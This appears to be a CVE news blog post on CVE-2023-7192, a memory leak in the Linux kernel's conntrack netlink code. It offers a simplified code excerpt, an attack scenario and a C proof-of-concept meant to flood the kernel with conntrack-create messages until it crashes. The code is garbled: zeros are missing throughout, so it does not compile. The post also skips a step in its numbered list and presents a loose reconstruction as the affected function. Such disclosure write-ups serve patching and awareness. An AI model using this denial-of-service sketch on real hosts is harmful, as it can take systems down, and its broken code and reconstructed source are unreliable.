CVE CyberSecurity Database News

CVE-2023-7192 - Memory Leak in ctnetlink_create_conntrack Can Lead to DoS in Linux Kernel

Poster -

In late 2023, security researchers found a critical memory leak vulnerability in Linux’s networking stack, specifically in the Linux Kernel’s connection tracking code. This vulnerability, CVE-2023-7192, affects the ctnetlink_create_conntrack function in net/netfilter/nf_conntrack_netlink.c. If exploited, a user with the right permissions (local attacker with CAP_NET_ADMIN) could force the kernel’s reference counter to overflow, causing a denial of service (DoS) — potentially crashing the entire system.

Even though the vulnerability requires specific privileges, Linux servers and containers often grant these capabilities to certain users and services, making timely patching and awareness crucial.

This post breaks down CVE-2023-7192 with easy-to-follow details, code snippets, references, and an example exploit concept.

Vulnerability Details

Component:
Linux Kernel, net/netfilter/nf_conntrack_netlink.c

Affected Function:
ctnetlink_create_conntrack

Problem:
When the kernel is handling connection tracking objects via network netlink messages, it mishandles reference counting during creation, causing a memory leak. If an attacker creates many conntrack states, these objects may not be properly released. After enough cycles, the kernel’s reference counter might overflow, resulting in a denial of service — most likely a kernel panic or freeze.

Required Privilege:
CAP_NET_ADMIN capability on the local system.

Vulnerable Code Overview

Let’s look at a simplified version resembling the affected function (based on upstream Linux Kernel sources):

// net/netfilter/nf_conntrack_netlink.c

static int ctnetlink_create_conntrack(struct net *net, struct nlmsghdr *nlh, ...)
{
    struct nf_conn *ct;
    ...
    // Allocate new conntrack object
    ct = nf_conntrack_alloc(...);
    if (!ct)
        return -ENOMEM;

    nf_conntrack_get(ct); // Increase refcount
    ...
    // Missing some release error path here...

    return ;
}

If an error occurs after allocation and before a proper cleanup, the code may skip the corresponding nf_conntrack_put(ct); (reference decrement) before returning, leaving objects dangling, never freed.

This memory leak is a classic case of a refcount imbalance, but it’s especially dangerous in kernel code where reference overflows can cause stability issues or system crashes.

Attack Scenario

1. Attacker has local access and the CAP_NET_ADMIN permission (granted to many container runtimes, VPN processes, etc.).
2. They send specially crafted netlink messages via NETLINK_NETFILTER sockets to the kernel, triggering ctnetlink_create_conntrack repeatedly.

Each time, the kernel fail to properly release all references, so memory gets “stuck”.

4. Over time, this can exhaust the kernel’s memory, or even worse, overflow the reference counter, possibly causing a panic or reboot (DoS).

Proof of Concept (PoC) Sketch

Here's a simplified PoC in C, illustrating how one might abuse this (requires kernel headers & privileges):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/netfilter/nfnetlink.h>
#include <linux/netfilter/nfnetlink_conntrack.h>

#define MAX_LOOPS 100000

int main() {
    int sock = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
    if (sock < ) {
        perror("socket");
        exit(1);
    }

    struct sockaddr_nl sa = {};
    sa.nl_family = AF_NETLINK;

    if (bind(sock, (struct sockaddr *)&sa, sizeof(sa)) < ) {
        perror("bind");
        exit(1);
    }

    // This message is illustrative; see the exploit repo or references for real crafting.
    for (int i = ; i < MAX_LOOPS; ++i) {
        struct {
            struct nlmsghdr nlh;
            struct nfgenmsg nfgenmsg;
            // ... Attributes with incomplete data to trigger the leak ...
        } req;
        memset(&req, , sizeof(req));
        req.nlh.nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg));
        req.nlh.nlmsg_type = (NFNL_SUBSYS_CTNETLINK << 8) | IPCTNL_MSG_CT_NEW;
        req.nlh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | NLM_F_CREATE;
        req.nfgenmsg.nfgen_family = AF_INET;

        send(sock, &req, req.nlh.nlmsg_len, );
    }
    close(sock);
    return ;
}

WARNING: This code is for educational and research purposes only. Running this on a vulnerable host can make it unusable.

Check your kernel version against the Linux Kernel CVE tracker and distro security releases

- Red Hat/CentOS advisory
- Ubuntu security notices
- Debian security tracker
- Upstream kernel patch (commit)

If using unpatched Linux in the 5.x and early 6.x kernel series (check with uname -r), and you allow untrusted code that can run with CAP_NET_ADMIN, you’re at risk.

Conclusion

CVE-2023-7192 is another example of how subtle kernel memory management bugs can have outsize security consequences — especially with network-facing logic and elevated permissions. Always keep your systems up to date, minimize privileged access, and monitor CVE advisories for critical projects.

References

- OSS Security CVE Writeup
- Linux Kernel Patch Commit
- Red Hat CVE-2023-7192
- Ubuntu CVE-2023-7192
- Exploit Database

Timeline

Published on: 01/02/2024 19:15:11 UTC
Last modified on: 03/19/2024 23:15:08 UTC